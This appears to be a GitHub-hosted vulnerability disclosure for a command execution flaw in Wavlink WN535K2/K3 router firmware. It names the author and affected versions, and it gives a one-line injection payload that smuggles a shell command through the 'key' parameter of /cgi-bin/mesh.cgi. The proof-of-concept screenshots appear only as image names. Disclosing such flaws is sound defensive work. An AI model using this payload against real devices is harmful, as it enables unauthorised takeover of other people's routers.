Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

###Wavlink mesh.cgi command execution

Exploit Title

Wavlink mesh.cgi command execution

Exploit Author

webraybtl@webray.com.cn inc

Vulnerability condition

Unlimited front desk

Vendor Homepage

https://www.wavlink.com

Software Link

https://www.wavlink.com/zh_cn/firmware.html

Version

WN535K2/K3

Description

There is a command execution vulnerability in wavlink, through which an attacker can gain server privileges

Payload used

/cgi-bin/mesh.cgi?page=upgrade&key=';commend;'

Proof of Concept

image-20220701115253571

image-20220701115458499

image-20220720095415814

image-20220720095441782